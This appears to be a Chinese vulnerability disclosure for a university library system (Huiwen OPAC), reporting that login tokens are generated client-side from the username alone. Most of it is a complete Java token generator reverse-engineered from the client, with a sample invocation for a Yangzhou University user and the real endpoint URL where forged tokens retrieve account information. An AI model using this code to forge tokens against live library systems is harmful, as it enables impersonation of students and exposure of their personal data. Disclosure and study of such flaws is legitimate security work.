### 简要描述:
生成认证token,只用用户名即可获取用户信息
### 详细说明:
将用于认证的token的生成方式在客户端实现且生成方式与密码无关
影响院校列表 http://www.libsys.com.cn/huiwen_app_center_2.php
### 漏洞证明:
```
import java.io.UnsupportedEncodingException;
import java.math.BigInteger;
/**
* Created by snail on 14-11-23.
*/
public class LibToken {
public static String makeToken(String s) {
int k, l, i1, j1, k1;
String s1, s2, s3, s4, s5;
StringBuffer stringBuffer;
byte abyte0[] = null;
try {
abyte0 = s.getBytes("utf-8");
} catch (UnsupportedEncodingException e) {
return null;
}
s1 = "";
for (l = 0; l < abyte0.length; l++) {
s2 = Integer.toHexString(0xff & abyte0[l]);
if (s2.length() == 1) {
s1 = (new StringBuilder(String.valueOf(s1))).append("0").append(s2).toString();
} else {
s1 = (new StringBuilder(String.valueOf(s1))).append(s2).toString();
}
// System.out.println(l+"-->s1-->"+s1+"s2-->"+s2);
}
//System.out.println("s1------>"+s1);
s4 = s1.toUpperCase();
stringBuffer = new StringBuffer("");
for (i1 = 0; i1 < s4.length(); i1++) {
stringBuffer.append(s4.charAt(i1));
if ((i1 % 2 == 0) && (i1 != 0) && (i1 < 12)) {
stringBuffer.append((int) (10D * Math.random()));
}
}
//System.out.println("stringBuffer.toString()--->"+stringBuffer.toString());
s5 = b(stringBuffer.toString());
//System.out.println("s5--->"+s5);
j1 = 0;
for (k = 0; k < s5.length(); k++) {
j1 += Integer.parseInt((new StringBuilder()).append(s5.charAt(k)).toString());
}
//System.out.println("j1---->"+j1);
k1 = j1 % 36;
if ((k1 <= 10) || (k1 == 16))
k1 = 18;
return (new StringBuilder(String.valueOf(a(s5, k1)))).append(a(k1)).toString();
}
public static String a(String s, int k) {
// System.out.println("s--->"+s+"---k-->-"+k);
BigInteger bigIntegerArray[] = new BigInteger[500];
for (int l = 0; l < 100; l++) {
bigIntegerArray[l] = new BigInteger("0");
}
BigInteger bi, bi1, bi2;
bi = new BigInteger(s);
bi1 = new BigInteger(String.valueOf(k));
bi2 = bi;
int i1;
for (i1 = 0; bi2.toString().length() != 1 || bi2.intValue() != 0; i1++) {
bigIntegerArray[i1] = bi2.mod(bi1);
bi2 = bi2.subtract(bigIntegerArray[i1]).divide(bi1);
}
for (int j1 = i1 - 1, k1 = 0; k1 < i1 / 2; k1++, j1--) {
BigInteger bi3 = bigIntegerArray[k1];
bigIntegerArray[k1] = bigIntegerArray[j1];
bigIntegerArray[j1] = bi3;
}
String s1 = "";
for (int l1 = 0; l1 < i1; l1++) {
s1 = (new StringBuilder((String.valueOf(s1)))).append(a(Long.parseLong(bigIntegerArray[l1].toString()))).toString();
}
// System.out.println("s1-->"+s1);
return s1;
}
public static String a(long l) {
if (l < 10L) {
//System.out.println("a00--->"+String.valueOf(l));
return String.valueOf(l);
}
if (l < 36L) {
//System.out.println("a11--->"+String.valueOf((char) (int) (65L + (l - 10L))));
return String.valueOf((char) (int) (65L + (l - 10L)));
} else
return "";
}
public static String b(String s) {
BigInteger bi1 = new BigInteger(String.valueOf(16));
BigInteger bi2 = new BigInteger("0");
BigInteger bi3 = bi2;
for (int k = 0; k < s.length(); k++) {
char c1 = s.charAt(k);
int m;
if ((c1 >= '0') && (c1 <= '9')) {
m = Integer.parseInt(String.valueOf(c1));
} else if ((c1 >= 'A') && (c1 <= 'Z')) {
m = 10 + (c1 - 'A');
} else {
m = -1;
}
bi3 = bi3.add(bi1.pow(-1 + (s.length() - k)).multiply(new BigInteger(String.valueOf(m))));
}
//System.out.println("bi3-->"+bi3.toString());
return bi3.toString();
}
public static void main(String[] args){
System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学"));
}
}
```
将生成的token用到
http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx
京公网安备 11010502034610号
暂无评论